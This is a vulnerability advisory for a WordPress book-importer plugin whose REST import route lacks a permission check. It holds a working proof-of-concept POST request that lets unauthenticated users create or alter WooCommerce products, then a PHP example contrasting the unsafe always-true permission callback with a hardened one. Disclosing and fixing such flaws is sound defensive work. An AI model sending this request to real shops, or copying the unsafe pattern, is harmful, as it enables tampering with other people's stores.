wpexploit / Wpvulndb WPEX-ID: 23B76562-D2AF-4753-BCE4-002921F3378E
History: Jun 14, 2021 - 12:00 a.m.

BCS BatchLine Book Importer < 1.5.8 - Unauthenticated Product Import

2021-06-14 00:00:00
wpvulndb

The plugin did not check permissions correctly in its wc/v3/bcsbertlinebookimport REST route, allowing unauthenticated users to import arbitrary products or update existing ones.

POST /wp-json/wc/v3/bcsbertlinebookimport HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/xml; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 200
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<books><book><isbn>123</isbn><title>Malicious Product</title><content>YOLO</content><price>0</price><stock>2</stock></book></books>
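The root cause described above is a REST route that accepts the request without an effective permission check. The PHP below is an added illustration and not the plugin's own code: it registers a route with the same namespace and path as in the advisory, first showing the unsafe always-true permission_callback pattern (commented out) and then a permission_callback that fails closed unless the caller has the WooCommerce product-management capability. The function names bcs_register_import_route, bcs_can_import_books and bcs_handle_book_import, the capability manage_woocommerce and the SKU-based product lookup are assumptions for this example; the WordPress and WooCommerce API calls used are real.

```php
<?php
// Added illustration (not the plugin's code): registering the
// wc/v3/bcsbertlinebookimport route with and without an effective
// permission check. The bcs_* names and the capability are assumptions.

add_action( 'rest_api_init', 'bcs_register_import_route' );

function bcs_register_import_route() {
    // UNSAFE pattern: a permission_callback that always returns true makes the
    // route reachable by anyone, which is the class of defect the advisory describes.
    // register_rest_route( 'wc/v3', '/bcsbertlinebookimport', array(
    //     'methods'             => WP_REST_Server::CREATABLE,
    //     'callback'            => 'bcs_handle_book_import',
    //     'permission_callback' => '__return_true',
    // ) );

    // Hardened: only users allowed to manage WooCommerce may reach the callback.
    register_rest_route( 'wc/v3', '/bcsbertlinebookimport', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'bcs_handle_book_import',
        'permission_callback' => 'bcs_can_import_books',
    ) );
}

function bcs_can_import_books( WP_REST_Request $request ) {
    // Fail closed: with no authenticated session (cookie + X-WP-Nonce, or an
    // application password) current_user_can() runs for user 0 and returns false.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        return new WP_Error(
            'rest_forbidden',
            __( 'You are not allowed to import products.', 'bcs-example' ),
            array( 'status' => rest_authorization_required_code() ) // 401 or 403
        );
    }
    return true;
}

function bcs_handle_book_import( WP_REST_Request $request ) {
    // Parse the XML body without network access; entities are not substituted.
    libxml_use_internal_errors( true );
    $xml = simplexml_load_string( $request->get_body(), 'SimpleXMLElement', LIBXML_NONET );
    if ( false === $xml ) {
        return new WP_Error( 'bcs_bad_xml', 'Request body is not well-formed XML.', array( 'status' => 400 ) );
    }

    $results = array();
    foreach ( $xml->book as $book ) {
        $isbn  = sanitize_text_field( (string) $book->isbn );
        $title = sanitize_text_field( (string) $book->title );
        $price = wc_format_decimal( (string) $book->price );
        $stock = absint( (string) $book->stock );

        if ( '' === $isbn || '' === $title ) {
            continue; // skip entries that cannot identify a product
        }

        // Update the product that already carries this SKU, otherwise create one.
        $product_id = wc_get_product_id_by_sku( $isbn );
        $product    = $product_id ? wc_get_product( $product_id ) : new WC_Product_Simple();
        if ( ! $product ) {
            continue; // stored product could not be loaded
        }

        $product->set_sku( $isbn );
        $product->set_name( $title );
        $product->set_regular_price( $price );
        $product->set_manage_stock( true );
        $product->set_stock_quantity( $stock );

        $results[] = array( 'isbn' => $isbn, 'id' => $product->save() );
    }

    return rest_ensure_response( array( 'imported' => $results ) );
}
```

With the hardened registration in place, the unauthenticated request shown in the proof of concept is rejected by the permission_callback before the import callback runs, and WordPress returns the status produced by rest_authorization_required_code(). The permission check belongs in permission_callback rather than inside the handler so that the REST server enforces it uniformly, including for requests that never reach the handler body.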